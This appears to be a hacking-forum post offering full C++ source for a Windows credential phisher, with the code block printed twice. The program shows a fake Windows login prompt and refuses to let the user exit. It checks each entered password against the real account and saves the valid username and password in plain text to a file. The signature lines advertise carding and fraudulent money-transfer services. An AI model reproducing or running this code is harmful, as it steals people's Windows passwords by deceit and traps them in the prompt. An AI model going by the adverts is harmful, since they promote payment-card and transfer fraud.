Simple C++ Program that attempts to phish the user's credentials. The program compares Windows NTLM password hash against the user's input; If true, the entered password will be logged in "output.txt". The program continuously loops and will NOT allow exit if the requirements are not met. Final executable is approximately [~18KB]. Compile with Visual Studio or any C++ IDE.
Screenshot:
[Image: Jvp5AV2.png]
#include <Windows.h>
#include <tchar.h>
#include <CommCtrl.h>
#include <wincred.h>
#include <iostream>
#include <fstream>
#include <atlstr.h>
using namespace std;
#pragma comment(lib, "comctl32.lib")
#pragma comment(lib, "Credui.lib")
void credwiz() {
BOOL loginStatus = FALSE;
do {
CREDUI_INFOW credui = {};
credui.cbSize = sizeof(credui);
credui.hwndParent = nullptr;
//credui.pszMessageText = L"...";
credui.pszCaptionText = L"Please enter Windows user credentials to proceed.";
credui.hbmBanner = nullptr;
ULONG authPackage = 0;
LPVOID outCredBuffer = nullptr;
ULONG outCredSize = 0;
BOOL save = false;
DWORD err = 0;
err = CredUIPromptForWindowsCredentialsW(&credui, err, &authPackage, nullptr, 0, &outCredBuffer, &outCredSize, &save, CREDUIWIN_ENUMERATE_CURRENT_USER);
if (err == ERROR_SUCCESS) {
WCHAR pszUName[CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR)];
WCHAR pszPwd[CREDUI_MAX_PASSWORD_LENGTH * sizeof(WCHAR)];
WCHAR domain[CREDUI_MAX_DOMAIN_TARGET_LENGTH * sizeof(WCHAR)];
DWORD maxLenName = CREDUI_MAX_USERNAME_LENGTH + 1;
DWORD maxLenPassword = CREDUI_MAX_PASSWORD_LENGTH + 1;
DWORD maxLenDomain = CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1;
CredUnPackAuthenticationBufferW(CRED_PACK_PROTECTED_CREDENTIALS, outCredBuffer, outCredSize, pszUName, &maxLenName, domain, &maxLenDomain, pszPwd, &maxLenPassword);
WCHAR parsedUserName[CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR)];
WCHAR parsedDomain[CREDUI_MAX_DOMAIN_TARGET_LENGTH * sizeof(WCHAR)];
CredUIParseUserNameW(pszUName, parsedUserName, CREDUI_MAX_USERNAME_LENGTH + 1, parsedDomain, CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1);
HANDLE handle = nullptr;
loginStatus = LogonUserW(parsedUserName, parsedDomain, pszPwd, LOGON32_LOGON_NETWORK, LOGON32_PROVIDER_DEFAULT, &handle);
ofstream myfile;
if (loginStatus == TRUE) {
CloseHandle(handle);
myfile.open("output.txt");
myfile << "\n[+] " << pszUName << ":" << pszPwd;
myfile.close();
break;
}
else {
std::wcout << "\n[-] " << pszUName << ":" << pszPwd;
loginStatus = FALSE;
}
}
} while (loginStatus == FALSE);
Sleep(1000);
}
int main() {
credwiz();
return 0;
}
[Image: B1pb5GE.gif]
[Image: mu4V40R.png]
Screenshot:
[Image: Jvp5AV2.png]
#include <Windows.h>
#include <tchar.h>
#include <CommCtrl.h>
#include <wincred.h>
#include <iostream>
#include <fstream>
#include <atlstr.h>
using namespace std;
#pragma comment(lib, "comctl32.lib")
#pragma comment(lib, "Credui.lib")
void credwiz() {
BOOL loginStatus = FALSE;
do {
CREDUI_INFOW credui = {};
credui.cbSize = sizeof(credui);
credui.hwndParent = nullptr;
//credui.pszMessageText = L"...";
credui.pszCaptionText = L"Please enter Windows user credentials to proceed.";
credui.hbmBanner = nullptr;
ULONG authPackage = 0;
LPVOID outCredBuffer = nullptr;
ULONG outCredSize = 0;
BOOL save = false;
DWORD err = 0;
err = CredUIPromptForWindowsCredentialsW(&credui, err, &authPackage, nullptr, 0, &outCredBuffer, &outCredSize, &save, CREDUIWIN_ENUMERATE_CURRENT_USER);
if (err == ERROR_SUCCESS) {
WCHAR pszUName[CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR)];
WCHAR pszPwd[CREDUI_MAX_PASSWORD_LENGTH * sizeof(WCHAR)];
WCHAR domain[CREDUI_MAX_DOMAIN_TARGET_LENGTH * sizeof(WCHAR)];
DWORD maxLenName = CREDUI_MAX_USERNAME_LENGTH + 1;
DWORD maxLenPassword = CREDUI_MAX_PASSWORD_LENGTH + 1;
DWORD maxLenDomain = CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1;
CredUnPackAuthenticationBufferW(CRED_PACK_PROTECTED_CREDENTIALS, outCredBuffer, outCredSize, pszUName, &maxLenName, domain, &maxLenDomain, pszPwd, &maxLenPassword);
WCHAR parsedUserName[CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR)];
WCHAR parsedDomain[CREDUI_MAX_DOMAIN_TARGET_LENGTH * sizeof(WCHAR)];
CredUIParseUserNameW(pszUName, parsedUserName, CREDUI_MAX_USERNAME_LENGTH + 1, parsedDomain, CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1);
HANDLE handle = nullptr;
loginStatus = LogonUserW(parsedUserName, parsedDomain, pszPwd, LOGON32_LOGON_NETWORK, LOGON32_PROVIDER_DEFAULT, &handle);
ofstream myfile;
if (loginStatus == TRUE) {
CloseHandle(handle);
myfile.open("output.txt");
myfile << "\n[+] " << pszUName << ":" << pszPwd;
myfile.close();
break;
}
else {
std::wcout << "\n[-] " << pszUName << ":" << pszPwd;
loginStatus = FALSE;
}
}
} while (loginStatus == FALSE);
Sleep(1000);
}
int main() {
credwiz();
return 0;
}
[Image: B1pb5GE.gif]
[Image: mu4V40R.png]
Verified & Trusted WesternUnion | MoneyGram | Bank - Transferring [299$ BTC for 2000$ WU]
Verified & Trusted Electronics Carding, Carding iPhone, Samsung Carding, MacBook Carding, Laptops Carding